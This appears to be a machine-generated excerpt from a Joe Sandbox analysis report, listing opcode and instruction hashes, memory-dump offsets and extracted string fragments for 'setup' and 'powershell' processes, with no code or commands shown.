                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1712575608350ABE32D8B28C895E7F73D6BBEA700F19813CD5C197619DB74AD00CB96
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4aa3f701baae3e3305fa372c1b8b19bcef3f78ab1ea597de1b97c2adc780127c
                                                                                                                                                                                                                                  • Instruction ID: 16415f8b93b85bf2518a71c019f5886e366a80264b8bd71a81db1fea2686599f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa3f701baae3e3305fa372c1b8b19bcef3f78ab1ea597de1b97c2adc780127c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB41D43B6187168BC324AF6CC4905AA73B1FF98780F1A886DC5C25B371EB346D29D741
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8c8e1dd64c2bdc5ad6f384edcd2603dfbb0e7806a65e10bc4c4caa545dd3c5ad
                                                                                                                                                                                                                                  • Instruction ID: b523b521829f3727b5d468ec36d4de6dcb685df756afe607e5791fcdd2c065ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c8e1dd64c2bdc5ad6f384edcd2603dfbb0e7806a65e10bc4c4caa545dd3c5ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D5119B19083419FD718CF28C491BABB7E2AB95305F14892DE5E6C7381E739D809CB52
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 85de29c35d6863bb30b53735a2dadbaaebed93b65f7f359fcf81152b39aa23c5
                                                                                                                                                                                                                                  • Instruction ID: 0966f68f88ce65b40d6ea06f0a35433875fc2ac0dec444cb5dc969b87881c818
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85de29c35d6863bb30b53735a2dadbaaebed93b65f7f359fcf81152b39aa23c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E131BD117893418FDB249A2C88527F6BBD2CB92364F0E477DC8634B3D2D61D8D08D3A2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e478691cc04ce96ce516819353fbfc411e543a4100e61be53017c37d36c2087c
                                                                                                                                                                                                                                  • Instruction ID: 3185e16876d42652b19a186169cf0300ae3eec660145d0d71c64175fdc24581e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e478691cc04ce96ce516819353fbfc411e543a4100e61be53017c37d36c2087c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46415E201083C24BD7328B3940687FBFFE49FA3315F2849ADC4E987292DB294516CB22
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 947dc8f3dd721a708692808d75c93bb472c8303fc19f9f8db2994205aacf456e
                                                                                                                                                                                                                                  • Instruction ID: accf5d7308126c8e238099a6bb118a751b05ca81302b714ca00df8bed1548583
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 947dc8f3dd721a708692808d75c93bb472c8303fc19f9f8db2994205aacf456e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2131522410C3C24AD7368B2940687FBFBE49FA3355F28599EC4E997292D7394506DB22
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 67891051f98fe2cb9f87e02526c2d10bc89883cb807bafceb9cc8b4ca2a07930
                                                                                                                                                                                                                                  • Instruction ID: 819028336a4dbee491c20490080b130bded6d729288ff5aeb2cd84b2133f9816
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67891051f98fe2cb9f87e02526c2d10bc89883cb807bafceb9cc8b4ca2a07930
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2412933A146249BD324CF29DC427A6B3E2ABD6314F5E8639D8D4DB391E634AC05CBC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 12176351571d1e8a4e8440f0e0d2e3f17f70c8eed4d1e2715401288be75603da
                                                                                                                                                                                                                                  • Instruction ID: d64a8f8c6666e698332e53d156a68720d901643a6cf9aa7729a6d5eef2ce8978
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12176351571d1e8a4e8440f0e0d2e3f17f70c8eed4d1e2715401288be75603da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61210539609240DBE71C9F28C892E7A7393FB56310F68557DC1C2475A1D73AAC13CB4A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6da1d98799a5cf67fca18437cd54ed0ee983f6cf2420899aa89e7d2d91ef49db
                                                                                                                                                                                                                                  • Instruction ID: 79ad1e79b9e5d3a8fed3524d7b2ff29cfe742d423659a6e9ee48d4646b15b5fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6da1d98799a5cf67fca18437cd54ed0ee983f6cf2420899aa89e7d2d91ef49db
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8314676508210ABE71CCF24D411E3A77A2BFEA310F1A546CD9C257615CB30AC01CFDA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5eeb1a2ade52ae19a5f26deacf42e279cb75b34cf03e15c9687d882d00921ede
                                                                                                                                                                                                                                  • Instruction ID: a95bf29d6e0a57db44e222fee2a5a67d900b39675d1887f3fc6b64ca5f521fad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eeb1a2ade52ae19a5f26deacf42e279cb75b34cf03e15c9687d882d00921ede
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B701C0742442008BEB149F1898E1F3A73E2EB86704F19543CEAC1571A2E635AC15C616
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a3392263a2fef94f1e7939ba329bd131c45995f9e6f47d9558bbdcacaaa272e9
                                                                                                                                                                                                                                  • Instruction ID: 9118c4c93f6ca5bda761d91c38ea27c18eed7fa1f5d5c200f87bd1d47c7f9f44
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3392263a2fef94f1e7939ba329bd131c45995f9e6f47d9558bbdcacaaa272e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F0593B7152650BA610CD69ECC0BABB3A6DBC6648B0E413CE981D3202C475E805C2A4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                  • Instruction ID: 5737a7f7c529fc2bd6dae00835793eeb4da2d07dcaef782b903a5356900e659e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F301B634A01508EFCB55EF98C184AADB7B6FF44310F608699D815AB395C774BE41DB80
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d75e4e44ceafceb02e1b7b200a1a1146d0a61b8cbc1b3268c50ce9a49a4ff901
                                                                                                                                                                                                                                  • Instruction ID: b7307d84259814765a246e98b80633b29c64f1a9a569f2ddcdcfdec4da46c868
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d75e4e44ceafceb02e1b7b200a1a1146d0a61b8cbc1b3268c50ce9a49a4ff901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E08C606496914BD7841A7889E11BBBFE1C753221F15597CD2E2D3181D06C8486966A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 606581a47d7df36f34e41e311434d61695aa73c945a63277c38267a446534f2d
                                                                                                                                                                                                                                  • Instruction ID: 36edb9c8603f0f2693683fb1e13d5fcff25e8e442b7a096ecc8af2051b164e94
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 606581a47d7df36f34e41e311434d61695aa73c945a63277c38267a446534f2d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68E0C271500601DBD738CF24CC45E76B27AAB83320F05C71CA0118B1E8DB34E4508B68
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4c765c56afbab89adce3b91aa2f21b1db36572e218bd99bec5990d92c48af48b
                                                                                                                                                                                                                                  • Instruction ID: ce1ae2a1107b9069e8e0d8ce87296d56f5e1653657ea4ba905ccb4fef8ede3d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c765c56afbab89adce3b91aa2f21b1db36572e218bd99bec5990d92c48af48b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DD01236B14410CBC341EF58EDE695DB3B4FF17601F48685594E1E7205C728D6054B5F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 17a541a6d152f7000e196ba3562fb73851827dd95982a29436cb11caab27a2b7
                                                                                                                                                                                                                                  • Instruction ID: e0113454d59c0aa18e1fba275a12e44cf4d0c06f4b23f70b085ca7d7e69e15b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17a541a6d152f7000e196ba3562fb73851827dd95982a29436cb11caab27a2b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65D012B180C3908FC3068F14D060175BFF0AA4B314F0968ACE4C8AB322C270E841CF0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3a6470ebb34247305cd39b241ee7fb1ae6640368fb97567402084e8697f7d190
                                                                                                                                                                                                                                  • Instruction ID: 5b0bdee6b8c3bdce941a12d284f7333441af36771757322614efcce17baadf59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a6470ebb34247305cd39b241ee7fb1ae6640368fb97567402084e8697f7d190
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AB09B74D08290C7C611DF145441576B1755747104F146560D56967321D625DC119699
Memory Dump Source
• Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$k$k
• API String ID: 0-2260618432
Strings
Memory Dump Source
• Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
Similarity
• API ID:
• String ID: ;o^
• API String ID: 0-3117013240
Memory Dump Source
• Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
Memory Dump Source
• Source File: 00000004.00000002.2013682375.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_362d000_powershell.jbxd
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$#j$$^q$$^q$$^q$k$k
                                                                                                                                                                                                                                  • API String ID: 0-2299674365
                                                                                                                                                                                                                                  • Opcode ID: 30f1fb2a75896084e5ee66c1891efd40577f6c97c66aef0918dee4dd00574455
                                                                                                                                                                                                                                  • Instruction ID: 164e98a088267041723a19d09a4a7dd93907661cbed08967ab89ddac6abdf73b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30f1fb2a75896084e5ee66c1891efd40577f6c97c66aef0918dee4dd00574455
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2A168B27043468FD7245A38981066AFFE59FC2210F2A84BBD645CF363EB36C845C7A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$d5j
                                                                                                                                                                                                                                  • API String ID: 0-3658821374
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q$k$k
                                                                                                                                                                                                                                  • API String ID: 0-283049261
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                                  • API String ID: 0-2049395529